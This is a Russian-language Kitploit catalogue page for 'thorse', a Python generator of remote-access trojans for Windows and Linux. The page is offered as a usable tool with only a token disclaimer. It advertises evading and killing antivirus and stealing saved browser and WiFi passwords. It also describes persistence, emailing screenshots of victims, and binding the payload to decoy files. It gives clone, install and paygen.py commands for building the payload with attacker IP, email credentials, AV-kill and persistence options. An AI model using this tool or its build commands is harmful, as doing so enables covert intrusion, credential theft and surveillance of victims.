Skip to content
KitploitKITPLOIT
ИнструментыЭксплойтыБлог
Log in
Отправить
ИнструментыЭксплойтыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
thorse — THorse — это генератор RAT (Remote Administrator Trojan) для систем Windows/Linux, написанный на Python 3. | Kitploit
Инструменты/GitHubGitHub/pushpenderindia/thorse
Взлом паролейФреймворки для эксплойтовГенерация полезной нагрузкиМеханизмы персистентностиОбход IDS/IPSПост-эксплуатацияКомандование и УправлениеТроян Удаленного ДоступаАнти-Бот
GitHubpushpenderindia/thorse

thorse

THorse — это генератор RAT (Remote Administrator Trojan) для систем Windows/Linux, написанный на Python 3.

614126633 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

THorse

THorse — это генератор RAT (Remote Administrator Trojan) для систем Windows/Linux, написанный на Python 3.

                    Этот небольшой python-скрипт умеет делать по-настоящему потрясающие вещи.

Отказ от ответственности

:computer: Этот проект был создан только в благих целях и для личного использования.

ДАННОЕ ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ ПРЕДОСТАВЛЯЕТСЯ «КАК ЕСТЬ» БЕЗ КАКИХ-ЛИБО ГАРАНТИЙ. ВЫ МОЖЕТЕ ИСПОЛЬЗОВАТЬ ЭТО ПРОГРАММНОЕ ОБЕСПЕЧЕНИЕ НА СВОЙ СОБСТВЕННЫЙ РИСК. ИСПОЛЬЗОВАНИЕ ЯВЛЯЕТСЯ ПОЛНОЙ ОТВЕТСТВЕННОСТЬЮ КОНЕЧНОГО ПОЛЬЗОВАТЕЛЯ. РАЗРАБОТЧИКИ НЕ НЕСУТ НИКАКОЙ ОТВЕТСТВЕННОСТИ И НЕ ОТВЕЧАЮТ ЗА ЛЮБОЕ НЕПРАВИЛЬНОЕ ИСПОЛЬЗОВАНИЕ ИЛИ УЩЕРБ, ПРИЧИНЁННЫЙ ЭТОЙ ПРОГРАММОЙ.

Возможности

  • Работает на Windows/Linux
  • Уведомляет о новой жертве по электронной почте
  • Не обнаруживаемый
  • Не требует прав root или администратора
  • Персистентность
  • Отправляет скриншот экрана ПК жертвы по электронной почте
  • Предоставляет атакующему полный доступ через Meterpreter
  • Для создания трояна не требуется установленный Metasploit
  • Создаёт исполняемый бинарный файл без зависимостей
  • Создаёт полезную нагрузку размером около 5 МБ с расширенной функциональностью
  • Обфусцирует полезную нагрузку перед компиляцией, обходя таким образом ещё несколько антивирусов
  • Сгенерированная полезная нагрузка кодируется в Base64, из-за чего её чрезвычайно сложно подвергнуть обратной разработке
  • Убивает антивирус на ПК жертвы и пытается отключить Центр безопасности Windows
  • Отличный красочный интерфейс для генерации полезной нагрузки
  • На стороне атакующего: при создании полезной нагрузки скрипт автоматически обнаруживает отсутствующие зависимости и устанавливает их
  • Возможность добавлять пользовательскую иконку к вредоносному файлу
  • Встроенный биндер, который может привязать исполняемый файл к любому файлу [.pdf, .txt, .exe и т.д.], запуская легитимный файл на переднем плане, а вредоносный код — в фоновом режиме как службу.
  • Проверяет наличие уже запущенного экземпляра в системе; если запущенный экземпляр найден, выполняется только легитимный файл [Запрет нескольких экземпляров].
  • Атакующий может создавать/компилировать как для Windows/Linux, используя Linux-систему, но с помощью Windows-машины может создавать/компилировать только исполняемые файлы для Windows
  • Извлекает сохранённые пароли из системы жертвы и отправляет их атакующему.
Поддерживаемые источники, из которых извлекаются сохранённые пароли :
Браузер Chrome
WiFi

Примечание: кастомный стилер написан с нуля и не полагается на LaZagne

Протестировано на

Kali) Kali Linux - ROLLING EDITION

Windows) Windows 10

Windows) Windows 8.1 - Pro

Windows) Windows 7 - Ultimate

Ниже перечислены ограничения meterpreter-полезной нагрузки, созданной с помощью Metasploit:-

  • Необходимо запустить Metasploit Listener до выполнения бэкдора
  • Бэкдор сам по себе не обеспечивает персистентность; чтобы сделать его персистентным, нам приходится использовать постэксплуатационные модули. А постэксплуатационные модули могут быть использованы только после успешной эксплуатации.
  • Не уведомляет нас при каждом выполнении полезной нагрузки в новой системе.

Мы все знаем, насколько мощной является полезная нагрузка Meterpreter, но всё же созданная на её основе полезная нагрузка неудовлетворительна.

Ниже приведены возможности этого генератора полезной нагрузки, которые дадут вам хорошее представление об этом python-скрипте:-

  • Использует реестр Windows для обеспечения персистентности в Windows.
  • Также обеспечивает персистентность в Linux-системах.
  • Полезная нагрузка может работать как в Linux, так и в Windows.
  • Предоставляет полный доступ; можно использовать как Metasploit listener, так и собственный listener (вы можете создать свой собственный listener)
  • Отправляет уведомление по электронной почте при каждом запуске полезной нагрузки в новой системе, вместе с полной информацией о системе.
  • Генерирует полезную нагрузку в течение 1 минуты или даже быстрее.
  • Поддерживает все постэксплуатационные модули Meterpreter.
  • Полезная нагрузка может быть создана как в Windows, так и в Linux.

Предварительные требования

  • Python 3.X
  • Несколько внешних модулей

Пожалуйста, обратите внимание:

В Windows укажите/задайте путь к Pyinstaller в paygen.py [строка 14]

Путь по умолчанию: PYTHON_PYINSTALLER_PATH = os.path.expanduser("C:/Python37-32/Scripts/pyinstaller.exe")

Измените его в соответствии с вашей системой

Как использовать в Linux

# Install dependencies 
$ Install latest python 3.x

# Navigate to the /opt directory (optional)
$ cd /opt/

# Clone this repository
$ git clone https://github.com/PushpenderIndia/thorse.git

# Go into the repository
$ cd thorse

# Installing dependencies
$ bash installer_linux.sh

# If you are getting any errors while executing installer_linux.sh, try to install using installer_linux.py
$ python3 installer_linux.py

$ chmod +x paygen.py
$ python3 paygen.py --help

# Making Payload/RAT
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path

# Making Payload/RAT with Custom AVKiller [By Default, Tons of Know AntiVirus is added in Kill_Targets]
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --kill_av AntiVirus.exe

# Making Payload/RAT with Custom Time to become persistence
$ python3 paygen.py --ip 127.0.0.1 --port 8080 -e [email protected] -p YourEmailPass -l -o output_file_name --icon icon_path --persistence 10 

Note: You can also use our custom icons from the icon folder, just use them like this  --icon icon/pdf.ico

Как использовать на VPS (рекомендуется)

# 1. Setup a VPS, You can buy Ubuntu VPS from any VPS Provider such as Digital Ocean, Linode, AWS, etc

# 2. Connect to your VPS Using SSH
$ ssh username@ip_address

# 3. Update Your Linux VPS
$ sudo apt update

# 4. Add Kali Linux Repository
$ sudo sh -c "echo 'deb https://http.kali.org/kali kali-rolling main non-free contrib' > /etc/apt/sources.list.d/kali.list"

# 5. Install gnupg package
$ sudo apt install gnupg

# 6. Add Kali Public Keys
$ wget 'https://archive.kali.org/archive-key.asc' && sudo apt-key add archive-key.asc

# 7. Update VPS
$ sudo apt update
Скачать инструмент